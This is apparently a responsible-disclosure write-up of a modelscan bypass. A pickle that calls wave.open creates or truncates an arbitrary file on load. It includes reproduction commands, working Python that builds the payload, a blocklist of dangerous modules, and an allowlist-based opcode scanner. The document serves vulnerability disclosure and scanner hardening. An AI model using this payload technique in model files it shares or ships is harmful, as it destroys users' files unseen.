---
license: mit
tags:
- security-research
- modelscan-bypass
- pickle-safety
---
# modelscan-bypass-wave

## Modelscan Bypass PoC — wave.open

**Severity**: MEDIUM

**Impact**: Arbitrary file write — `wave.open(path, "wb")` creates, or truncates if it already exists, the file at `path` when the pickle is loaded

**modelscan version**: 0.7.6 (latest on PyPI at the time of writing)

**Result**: "No issues found!" ✅ (false negative)
### Chain

`wave.open("/target/path", "wb")` → creates or truncates the file at an arbitrary path

The pickle references the global `wave.open` and invokes it with the `REDUCE` opcode during `pickle.loads`. `wave.Wave_write` opens the path with `open(path, "wb")`, so the file is created (or an existing file emptied) as a side effect of loading, with no reference to `os`, `builtins`, `subprocess` or any other conventionally blocked module in the payload.
### Why It Works

`wave.open` is NOT in modelscan's `unsafe_globals` blocklist, and the `wave` module is NOT in the blocklist either, so the global reference passes the scan unflagged.

The scanner matches referenced globals against a fixed list of known-dangerous modules. Any standard-library callable outside that list that accepts a path and opens it for writing produces the same false negative; a blocklist cannot enumerate every such callable, whereas an allowlist of the globals a model file legitimately needs would reject `wave.open` by default.
### Reproduction

```bash
pip install modelscan==0.7.6   # version tested; later releases may differ
modelscan scan -p bypass_poc.pkl
# Output: "No issues found!"
python3 -c "import pickle; pickle.loads(open('bypass_poc.pkl','rb').read())"
# Loading the pickle calls wave.open("/target/path", "wb"): the file at
# /target/path is created, or truncated to zero bytes if it already existed
```
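The chain, the blocklist gap and the reproduction above, as an added self-contained example that is not part of the original PoC and does not invoke modelscan. It builds the `wave.open` pickle into a scratch directory, loads it to show the file being created and an existing file being truncated, and scans the pickle's opcodes two ways: a constructed, abbreviated blocklist standing in for a list of known-dangerous modules (not a copy of modelscan's `unsafe_globals`), and an allowlist of modules a model file is expected to reference. The `BLOCKLIST` and `ALLOWLIST` contents, the file names and the `WaveOpenPayload` class are assumptions made for the example.

```python
"""Added example, not the original PoC: build a wave.open pickle, prove the
file write, and contrast blocklist and allowlist scanning of its globals."""
import os
import pickle
import pickletools
import tempfile
import wave


class WaveOpenPayload:
    """When unpickled, REDUCE calls wave.open(path, "wb"), creating/truncating path."""

    def __init__(self, path):
        self.path = path

    def __reduce__(self):
        return (wave.open, (self.path, "wb"))


def build_poc(path, protocol=4):
    """Serialise the payload; protocol 4 emits STACK_GLOBAL, protocol 2 emits GLOBAL."""
    return pickle.dumps(WaveOpenPayload(path), protocol=protocol)


def referenced_globals(data):
    """Return the set of "module.name" globals a pickle references.

    GLOBAL carries "module name" inline; STACK_GLOBAL consumes the two most
    recently pushed strings. Tracking pushed strings without full stack
    emulation is enough for pickles produced by pickle.dumps (a hardened
    scanner should emulate the stack and memo, e.g. BINGET re-use).
    """
    found = set()
    strings = []
    string_ops = {"SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE",
                  "STRING", "BINSTRING", "SHORT_BINSTRING"}
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "GLOBAL":
            module, name = arg.split(" ", 1)
            found.add(f"{module}.{name}")
        elif op.name == "STACK_GLOBAL":
            if len(strings) < 2:
                raise ValueError("STACK_GLOBAL without two preceding strings")
            found.add(f"{strings[-2]}.{strings[-1]}")
        elif op.name in string_ops:
            strings.append(arg)
    return found


# Constructed, abbreviated stand-in for a blocklist of known-dangerous modules.
BLOCKLIST = {"os", "posix", "nt", "subprocess", "sys", "builtins", "shutil", "socket"}
# Assumed allowlist: modules a plain model file is expected to reference.
ALLOWLIST = {"collections", "numpy", "torch"}


def blocklist_verdict(data):
    """Flag only globals whose module is on the blocklist (misses wave.open)."""
    return sorted(g for g in referenced_globals(data) if g.split(".")[0] in BLOCKLIST)


def allowlist_verdict(data):
    """Flag every global whose module is not explicitly allowed (catches wave.open)."""
    return sorted(g for g in referenced_globals(data) if g.split(".")[0] not in ALLOWLIST)


def demonstrate(tmpdir, protocol=4, preexisting=False):
    """Write the PoC pickle, scan it both ways, load it, and report the file's fate."""
    target = os.path.join(tmpdir, f"dropped_p{protocol}_{int(preexisting)}.wav")
    if preexisting:
        with open(target, "wb") as fh:
            fh.write(b"original contents")  # 17 bytes that the load will wipe
    size_before = os.path.getsize(target) if os.path.exists(target) else None
    data = build_poc(target, protocol)
    obj = pickle.loads(data)  # the unsafe load: wave.open(target, "wb") runs here
    try:
        obj.close()
    except wave.Error:
        pass  # no WAV params were set, so close() writes no header; the empty file remains
    return {
        "globals": referenced_globals(data),
        "blocklist_flags": blocklist_verdict(data),
        "allowlist_flags": allowlist_verdict(data),
        "size_before": size_before,
        "size_after": os.path.getsize(target),
    }


def run_all():
    """Exercise both pickle protocols in a scratch directory, keyed by protocol."""
    results = {}
    with tempfile.TemporaryDirectory() as d:
        results[4] = demonstrate(d, protocol=4)                    # fresh file is created
        results[2] = demonstrate(d, protocol=2, preexisting=True)  # existing file is truncated
    return results


if __name__ == "__main__":
    for proto, r in run_all().items():
        print(f"protocol {proto}: globals={sorted(r['globals'])} "
              f"blocklist={r['blocklist_flags']} allowlist={r['allowlist_flags']} "
              f"size {r['size_before']} -> {r['size_after']}")
```

The blocklist check returns nothing for either protocol while the allowlist check flags `wave.open`; the scan runs purely on opcodes and never loads the pickle, which is the only safe way to inspect untrusted model files.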
### Responsible Disclosure

This PoC is part of a responsible disclosure to ProtectAI via the Huntr MFV program.